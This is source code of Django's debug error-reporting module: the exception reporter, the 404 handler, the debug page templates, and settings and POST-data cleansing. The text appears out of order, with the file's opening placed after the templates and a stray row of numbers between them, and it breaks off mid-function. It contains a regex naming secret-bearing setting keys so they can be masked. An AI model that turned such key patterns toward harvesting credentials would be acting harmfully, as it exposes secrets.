def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = None
self.template_does_not_exist = False
self.loader_debug_info = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
"Return a Context instance containing traceback information."
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
from django.template.loader import template_source_loaders
self.template_does_not_exist = True
self.loader_debug_info = []
for loader in template_source_loaders:
try:
source_list_func = loader.get_template_sources
# NOTE: This assumes exc_value is the name of the template that
# the loader attempted to load.
template_list = [{'name': t, 'exists': os.path.exists(t)} \
for t in source_list_func(str(self.exc_value))]
except AttributeError:
template_list = []
loader_name = loader.__module__ + '.' + loader.__class__.__name__
self.loader_debug_info.append({
'loader': loader_name,
'templates': template_list,
})
if (settings.TEMPLATE_DEBUG and
hasattr(self.exc_value, 'django_template_source')):
self.get_template_exception_info()
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame['vars'] = [(k, force_escape(pprint(v))) for k, v in frame['vars']]
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(unicode_str[max(start-5, 0):min(end+5, len(unicode_str))], 'ascii', errors='replace')
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': datetime.datetime.now(),
'django_version_info': get_version(),
'sys_path' : sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'loader_debug_info': self.loader_debug_info,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = Template(TECHNICAL_500_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data())
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = Template(TECHNICAL_500_TEXT_TEMPLATE, name='Technical 500 template')
c = Context(self.get_traceback_data(), autoescape=False)
return t.render(c)
def get_template_exception_info(self):
origin, (start, end) = self.exc_value.django_template_source
template_source = origin.reload()
context_lines = 10
line = 0
upto = 0
source_lines = []
before = during = after = ""
for num, next in enumerate(linebreak_iter(template_source)):
if start >= upto and end <= next:
line = num
before = escape(template_source[upto:start])
during = escape(template_source[start:end])
after = escape(template_source[end:next])
source_lines.append( (num, escape(template_source[upto:next])) )
upto = next
total = len(source_lines)
top = max(1, line - context_lines)
bottom = min(total, line + 1 + context_lines)
# In some rare cases, exc_value.args might be empty.
try:
message = self.exc_value.args[0]
except IndexError:
message = '(Could not get exception message)'
self.template_info = {
'message': message,
'source_lines': source_lines[top:bottom],
'before': before,
'during': during,
'after': after,
'top': top,
'bottom': bottom,
'total': total,
'line': line,
'name': origin.name,
}
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
source = loader.get_source(module_name)
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.readlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
# apply tokenize.detect_encoding to decode the source into a Unicode
# string, then we should do that ourselves.
if isinstance(source[0], six.binary_type):
encoding = 'ascii'
for line in source[:2]:
# File coding may be specified. Match pattern from PEP-263
# (http://www.python.org/dev/peps/pep-0263/)
match = re.search(br'coding[:=]\s*([-\w.]+)', line)
if match:
encoding = match.group(1).decode('ascii')
break
source = [six.text_type(sline, encoding, 'replace') for sline in source]
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = [line.strip('\n') for line in source[lower_bound:lineno]]
context_line = source[lineno].strip('\n')
post_context = [line.strip('\n') for line in source[lineno+1:upper_bound]]
return lower_bound, pre_context, context_line, post_context
def get_traceback_frames(self):
frames = []
tb = self.tb
while tb is not None:
# Support for __traceback_hide__ which is used by a few libraries
# to hide internal frames.
if tb.tb_frame.f_locals.get('__traceback_hide__'):
tb = tb.tb_next
continue
filename = tb.tb_frame.f_code.co_filename
function = tb.tb_frame.f_code.co_name
lineno = tb.tb_lineno - 1
loader = tb.tb_frame.f_globals.get('__loader__')
module_name = tb.tb_frame.f_globals.get('__name__') or ''
pre_context_lineno, pre_context, context_line, post_context = self._get_lines_from_file(filename, lineno, 7, loader, module_name)
if pre_context_lineno is not None:
frames.append({
'tb': tb,
'type': module_name.startswith('django.') and 'django' or 'user',
'filename': filename,
'function': function,
'lineno': lineno + 1,
'vars': self.filter.get_traceback_frame_variables(self.request, tb.tb_frame),
'id': id(tb),
'pre_context': pre_context,
'context_line': context_line,
'post_context': post_context,
'pre_context_lineno': pre_context_lineno + 1,
})
tb = tb.tb_next
return frames
def format_exception(self):
"""
Return the same data as from traceback.format_exception.
"""
import traceback
frames = self.get_traceback_frames()
tb = [ (f['filename'], f['lineno'], f['function'], f['context_line']) for f in frames ]
list = ['Traceback (most recent call last):\n']
list += traceback.format_list(tb)
list += traceback.format_exception_only(self.exc_type, self.exc_value)
return list
def technical_404_response(request, exception):
"Create a technical 404 error response. The exception should be the Http404."
try:
tried = exception.args[0]['tried']
except (IndexError, TypeError, KeyError):
tried = []
else:
if (not tried # empty URLconf
or (request.path == '/'
and len(tried) == 1 # default URLconf
and len(tried[0]) == 1
and tried[0][0].app_name == tried[0][0].namespace == 'admin')):
return default_urlconf(request)
urlconf = getattr(request, 'urlconf', settings.ROOT_URLCONF)
if isinstance(urlconf, types.ModuleType):
urlconf = urlconf.__name__
t = Template(TECHNICAL_404_TEMPLATE, name='Technical 404 template')
c = Context({
'urlconf': urlconf,
'root_urlconf': settings.ROOT_URLCONF,
'request_path': request.path_info[1:], # Trim leading slash
'urlpatterns': tried,
'reason': force_bytes(exception, errors='replace'),
'request': request,
'settings': get_safe_settings(),
})
return HttpResponseNotFound(t.render(c), content_type='text/html')
def default_urlconf(request):
"Create an empty URLconf 404 error response."
t = Template(DEFAULT_URLCONF_TEMPLATE, name='Default URLconf template')
c = Context({})
return HttpResponse(t.render(c), content_type='text/html')
#
# Templates are embedded in the file so that we know the error handler will
# always work even if the template loader is broken.
#
TECHNICAL_500_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
code, pre { font-size: 100%; white-space: pre-wrap; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%; }
table td.code pre { overflow:hidden; }
table.source th { color:#666; }
table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; color: #222; }
ul.traceback li.frame { padding-bottom:1em; color:#666; }
ul.traceback li.user { background-color:#e0e0e0; color:#000 }
div.context { padding:10px 0; overflow:hidden; }
div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; }
div.context ol li pre { display:inline; }
div.context ol.context-line li { color:#505050; background-color:#dfdfdf; }
div.context ol.context-line li span { position:absolute; right:32px; }
.user div.context ol.context-line li { background-color:#bbb; color:#000; }
.user div.context ol li { color:#666; }
div.commands { margin-left: 40px; }
div.commands a { color:#555; text-decoration:none; }
.user div.commands a { color: black; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#unicode-hint { background:#eee; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
h2 span.commands { font-size:.7em;}
span.commands a:link {color:#5E5694;}
pre.exception_value { font-family: sans-serif; color: #666; font-size: 1.5em; margin: 10px 0 10px 0; }
</style>
{% if not is_email %}
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon; Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
hideAll(getElementsByClassName(document, 'div', 'pastebin'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy-and-paste view";
s2 = "Switch back to interactive view";
link.innerHTML = link.innerHTML == s1 ? s2 : s1;
toggle('browserTraceback', 'pastebinTraceback');
return false;
}
//-->
</script>
{% endif %}
</head>
<body>
<div id="summary">
<h1>{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %}{% if request %} at {{ request.path_info|escape }}{% endif %}</h1>
<pre class="exception_value">{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception supplied{% endif %}</pre>
<table class="meta">
{% if request %}
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
{% endif %}
<tr>
<th>Django Version:</th>
<td>{{ django_version_info }}</td>
</tr>
{% if exception_type %}
<tr>
<th>Exception Type:</th>
<td>{{ exception_type }}</td>
</tr>
{% endif %}
{% if exception_type and exception_value %}
<tr>
<th>Exception Value:</th>
<td><pre>{{ exception_value|force_escape }}</pre></td>
</tr>
{% endif %}
{% if lastframe %}
<tr>
<th>Exception Location:</th>
<td>{{ lastframe.filename|escape }} in {{ lastframe.function|escape }}, line {{ lastframe.lineno }}</td>
</tr>
{% endif %}
<tr>
<th>Python Executable:</th>
<td>{{ sys_executable|escape }}</td>
</tr>
<tr>
<th>Python Version:</th>
<td>{{ sys_version_info }}</td>
</tr>
<tr>
<th>Python Path:</th>
<td><pre>{{ sys_path|pprint }}</pre></td>
</tr>
<tr>
<th>Server time:</th>
<td>{{server_time|date:"r"}}</td>
</tr>
</table>
</div>
{% if unicode_hint %}
<div id="unicode-hint">
<h2>Unicode error hint</h2>
<p>The string that could not be encoded/decoded was: <strong>{{ unicode_hint|force_escape }}</strong></p>
</div>
{% endif %}
{% if template_does_not_exist %}
<div id="template-not-exist">
<h2>Template-loader postmortem</h2>
{% if loader_debug_info %}
<p>Django tried loading these templates, in this order:</p>
<ul>
{% for loader in loader_debug_info %}
<li>Using loader <code>{{ loader.loader }}</code>:
<ul>{% for t in loader.templates %}<li><code>{{ t.name }}</code> (File {% if t.exists %}exists{% else %}does not exist{% endif %})</li>{% endfor %}</ul>
</li>
{% endfor %}
</ul>
{% else %}
<p>Django couldn't find any templates because your <code>TEMPLATE_LOADERS</code> setting is empty!</p>
{% endif %}
</div>
{% endif %}
{% if template_info %}
<div id="template">
<h2>Error during template rendering</h2>
<p>In template <code>{{ template_info.name }}</code>, error at line <strong>{{ template_info.line }}</strong></p>
<h3>{{ template_info.message }}</h3>
<table class="source{% if template_info.top %} cut-top{% endif %}{% ifnotequal template_info.bottom template_info.total %} cut-bottom{% endifnotequal %}">
{% for source_line in template_info.source_lines %}
{% ifequal source_line.0 template_info.line %}
<tr class="error"><th>{{ source_line.0 }}</th>
<td>{{ template_info.before }}<span class="specific">{{ template_info.during }}</span>{{ template_info.after }}</td></tr>
{% else %}
<tr><th>{{ source_line.0 }}</th>
<td>{{ source_line.1 }}</td></tr>
{% endifequal %}
{% endfor %}
</table>
</div>
{% endif %}
{% if frames %}
<div id="traceback">
<h2>Traceback <span class="commands">{% if not is_email %}<a href="#" onclick="return switchPastebinFriendly(this);">Switch to copy-and-paste view</a></span>{% endif %}</h2>
{% autoescape off %}
<div id="browserTraceback">
<ul class="traceback">
{% for frame in frames %}
<li class="frame {{ frame.type }}">
<code>{{ frame.filename|escape }}</code> in <code>{{ frame.function|escape }}</code>
{% if frame.context_line %}
<div class="context" id="c{{ frame.id }}">
{% if frame.pre_context and not is_email %}
<ol start="{{ frame.pre_context_lineno }}" class="pre-context" id="pre{{ frame.id }}">{% for line in frame.pre_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
<ol start="{{ frame.lineno }}" class="context-line"><li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ frame.context_line|escape }}</pre>{% if not is_email %} <span>...</span>{% endif %}</li></ol>
{% if frame.post_context and not is_email %}
<ol start='{{ frame.lineno|add:"1" }}' class="post-context" id="post{{ frame.id }}">{% for line in frame.post_context %}<li onclick="toggle('pre{{ frame.id }}', 'post{{ frame.id }}')"><pre>{{ line|escape }}</pre></li>{% endfor %}</ol>
{% endif %}
</div>
{% endif %}
{% if frame.vars %}
<div class="commands">
{% if is_email %}
<h2>Local Vars</h2>
{% else %}
<a href="#" onclick="return varToggle(this, '{{ frame.id }}')"><span>▶</span> Local vars</a>
{% endif %}
</div>
<table class="vars" id="v{{ frame.id }}">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in frame.vars|dictsort:"0" %}
<tr>
<td>{{ var.0|force_escape }}</td>
<td class="code"><pre>{{ var.1 }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% endif %}
</li>
{% endfor %}
</ul>
</div>
{% endautoescape %}
<form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">
{% if not is_email %}
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title" value="{{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri|escape }}
{% endif %}
Django Version: {{ django_version_info }}
Python Version: {{ sys_version_info }}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template Loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}
Traceback:
{% for frame in frames %}File "{{ frame.filename|escape }}" in {{ frame.function|escape }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line|escape }}{% endif %}
{% endfor %}
Exception Type: {{ exception_type|escape }}{% if request %} at {{ request.path_info|escape }}{% endif %}
Exception Value: {{ exception_value|force_escape }}
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public Web site">
</div>
</form>
</div>
{% endif %}
{% endif %}
<div id="requestinfo">
<h2>Request information</h2>
{% if request %}
<h3 id="get-info">GET</h3>
{% if request.GET %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.GET.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No GET data</p>
{% endif %}
<h3 id="post-info">POST</h3>
{% if filtered_POST %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in filtered_POST.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No POST data</p>
{% endif %}
<h3 id="files-info">FILES</h3>
{% if request.FILES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.FILES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No FILES data</p>
{% endif %}
<h3 id="cookie-info">COOKIES</h3>
{% if request.COOKIES %}
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.COOKIES.items %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>No cookie data</p>
{% endif %}
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in request.META.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
{% else %}
<p>Request data not supplied</p>
{% endif %}
<h3 id="settings-info">Settings</h3>
<h4>Using settings module <code>{{ settings.SETTINGS_MODULE }}</code></h4>
<table class="req">
<thead>
<tr>
<th>Setting</th>
<th>Value</th>
</tr>
</thead>
<tbody>
{% for var in settings.items|dictsort:"0" %}
<tr>
<td>{{ var.0 }}</td>
<td class="code"><pre>{{ var.1|pprint }}</pre></td>
</tr>
{% endfor %}
</tbody>
</table>
</div>
{% if not is_email %}
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in your
Django settings file. Change that to <code>False</code>, and Django will
display a standard 500 page.
</p>
</div>
{% endif %}
</body>
</html>
"""
TECHNICAL_500_TEXT_TEMPLATE = """{% firstof exception_type 'Report' %}{% if request %} at {{ request.path_info }}{% endif %}
{% firstof exception_value 'No exception supplied' %}
{% if request %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.build_absolute_uri }}{% endif %}
Django Version: {{ django_version_info }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path: {{ sys_path }}
Server time: {{server_time|date:"r"}}
Installed Applications:
{{ settings.INSTALLED_APPS|pprint }}
Installed Middleware:
{{ settings.MIDDLEWARE_CLASSES|pprint }}
{% if template_does_not_exist %}Template loader Error:
{% if loader_debug_info %}Django tried loading these templates, in this order:
{% for loader in loader_debug_info %}Using loader {{ loader.loader }}:
{% for t in loader.templates %}{{ t.name }} (File {% if t.exists %}exists{% else %}does not exist{% endif %})
{% endfor %}{% endfor %}
{% else %}Django couldn't find any templates because your TEMPLATE_LOADERS setting is empty!
{% endif %}
{% endif %}{% if template_info %}
Template error:
In template {{ template_info.name }}, error at line {{ template_info.line }}
{{ template_info.message }}{% for source_line in template_info.source_lines %}{% ifequal source_line.0 template_info.line %}
{{ source_line.0 }} : {{ template_info.before }} {{ template_info.during }} {{ template_info.after }}
{% else %}
{{ source_line.0 }} : {{ source_line.1 }}
{% endifequal %}{% endfor %}{% endif %}{% if frames %}
Traceback:
{% for frame in frames %}File "{{ frame.filename }}" in {{ frame.function }}
{% if frame.context_line %} {{ frame.lineno }}. {{ frame.context_line }}{% endif %}
{% endfor %}
{% if exception_type %}Exception Type: {{ exception_type }}{% if request %} at {{ request.path_info }}{% endif %}
{% if exception_value %}Exception Value: {{ exception_value }}{% endif %}{% endif %}{% endif %}
{% if request %}Request information:
GET:{% for k, v in request.GET.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No GET data{% endfor %}
POST:{% for k, v in filtered_POST.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No POST data{% endfor %}
FILES:{% for k, v in request.FILES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No FILES data{% endfor %}
COOKIES:{% for k, v in request.COOKIES.items %}
{{ k }} = {{ v|stringformat:"r" }}{% empty %} No cookie data{% endfor %}
META:{% for k, v in request.META.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
{% else %}Request data not supplied
{% endif %}
Settings:
Using settings module {{ settings.SETTINGS_MODULE }}{% for k, v in settings.items|dictsort:"0" %}
{{ k }} = {{ v|stringformat:"r" }}{% endfor %}
You're seeing this error because you have DEBUG = True in your
Django settings file. Change that to False, and Django will
display a standard 500 page.
"""
TECHNICAL_404_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at {{ request.path_info|escape }}</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>{{ request.META.REQUEST_METHOD }}</td>
</tr>
<tr>
<th>Request URL:</th>
<td>{{ request.build_absolute_uri|escape }}</td>
</tr>
</table>
</div>
<div id="info">
{% if urlpatterns %}
<p>
Using the URLconf defined in <code>{{ urlconf }}</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
{% for pattern in urlpatterns %}
<li>
{% for pat in pattern %}
{{ pat.regex.pattern }}
{% if forloop.last and pat.name %}[name='{{ pat.name }}']{% endif %}
{% endfor %}
</li>
{% endfor %}
</ol>
<p>The current URL, <code>{{ request_path|escape }}</code>, didn't match any of these.</p>
{% else %}
<p>{{ reason }}</p>
{% endif %}
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
"""
DEFAULT_URLCONF_TEMPLATE = """
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE"><title>Welcome to Django</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#summary { background: #e0ebff; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>It worked!</h1>
<h2>Congratulations on your first Django-powered page.</h2>
</div>
<div id="instructions">
<p>
Of course, you haven't actually done any work yet.
Next, start your first app by running <code>python manage.py startapp [appname]</code>.
</p>
</div>
<div id="explanation">
<p>
You're seeing this message because you have <code>DEBUG = True</code> in your
Django settings file and you haven't configured any URLs. Get to work!
</p>
</div>
</body></html>
"""
| 38.324932 | 251 | 0.594307 | from __future__ import unicode_literals
import datetime
import os
import re
import sys
import types
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import (HttpResponse, HttpResponseServerError,
HttpResponseNotFound, HttpRequest, build_request_repr)
from django.template import Template, Context, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils.html import escape
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_by_path
from django.utils import six
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|PROFANITIES_LIST|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p+1
p = template_source.find('\n', p+1)
yield len(template_source) + 1
def cleanse_setting(key, value):
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = dict((k, cleanse_setting(k, v)) for k,v in value.items())
else:
cleansed = value
except TypeError:
cleansed = value
return cleansed
def get_safe_settings():
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb):
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponseServerError(text, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponseServerError(html, content_type='text/html')
# Cache for the default exception reporter filter instance.
default_exception_reporter_filter = None
def get_exception_reporter_filter(request):
global default_exception_reporter_filter
if default_exception_reporter_filter is None:
# Load the default filter for the first time and cache it.
default_exception_reporter_filter = import_by_path(
settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
if request:
return getattr(request, 'exception_reporter_filter', default_exception_reporter_filter)
else:
return default_exception_reporter_filter
class ExceptionReporterFilter(object):
def get_request_repr(self, request):
if request is None:
return repr(None)
else:
return build_request_repr(request, POST_override=self.get_post_parameters(request))
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(six.iteritems(tb_frame.f_locals))
class SafeExceptionReporterFilter(ExceptionReporterFilter):
def is_active(self, request):
return settings.DEBUG is False
def get_post_parameters(self, request):
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
# Loop through the frame's callers to see if the sensitive_variables
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
